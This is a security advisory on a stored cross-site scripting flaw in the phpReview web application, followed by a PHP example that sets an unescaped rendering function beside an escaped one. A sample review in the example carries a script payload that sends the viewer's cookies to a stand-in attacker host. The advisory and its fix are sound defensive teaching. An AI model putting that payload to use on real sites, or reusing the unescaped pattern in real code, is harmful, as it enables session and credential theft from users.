phpReview is a freely available, open-source, customizable web "reviewing" application. It allows users to enter and maintain reviews of such things as books, films, etc. phpReview does not filter HTML tags from user-submitted reviews. As a result, it is possible for a malicious user to include script code in a review. The script code is stored with the review and executed in the browser of every web user who views it. Because the page is served by the website running the software, the malicious script code appears to originate from that site and runs with its origin. This issue exposes web users to cross-site scripting attacks and may potentially be leveraged to do such things as steal cookie-based authentication credentials.
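The following is an added illustration of the class of bug described above; it is not phpReview's own code, and the function and field names (renderReviewVulnerable, renderReviewSafe, escapeHtml, $review['body']) are assumptions. It shows the unfiltered output pattern beside the corrected one, fed with a constructed review whose payload does what the advisory warns about, reading the viewing user's cookies.

```php
<?php
// Added example, not phpReview's own code. Function and field names are
// assumptions chosen for illustration.

// Constructed sample review, the kind of input a malicious user could submit.
// The script payload sends the viewer's cookies to an attacker-chosen host,
// the credential-theft case the advisory describes.
$review = [
    'title' => 'A "great" book <3',
    'body'  => 'Loved it.<script>new Image().src='
             . '"http://attacker.example/?c="+encodeURIComponent(document.cookie)'
             . '</script>',
];

// Vulnerable pattern: user-submitted text is echoed straight into the page,
// so the <script> element is parsed and run by every browser that loads it.
function renderReviewVulnerable(array $review): string {
    return "<h2>{$review['title']}</h2>\n<p>{$review['body']}</p>\n";
}

// Hardened pattern: encode on output. htmlspecialchars turns <, >, &, " and '
// into entities, so the browser renders the payload as text, not markup.
// ENT_QUOTES and an explicit UTF-8 charset avoid relying on PHP defaults.
function escapeHtml(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function renderReviewSafe(array $review): string {
    return "<h2>" . escapeHtml($review['title']) . "</h2>\n"
         . "<p>" . escapeHtml($review['body']) . "</p>\n";
}

// Regression check: a raw <script tag must never survive into the output.
function containsRawScriptTag(string $html): bool {
    return (bool) preg_match('/<script\b/i', $html);
}

$vulnerable = renderReviewVulnerable($review);
$safe       = renderReviewSafe($review);

echo "--- unfiltered output ---\n", $vulnerable;
echo "--- escaped output ---\n", $safe;
echo "unfiltered output carries a live <script> tag: ",
     var_export(containsRawScriptTag($vulnerable), true), "\n";
echo "escaped output carries a live <script> tag:    ",
     var_export(containsRawScriptTag($safe), true), "\n";
```

Run it with `php` from the command line to compare the two renderings. Output encoding is the fix for the bug as described; if the application intends to allow some HTML in reviews, an allowlist-based sanitizer is needed instead of raw echo, and marking session cookies HttpOnly limits (but does not remove) the impact of any script that still gets through.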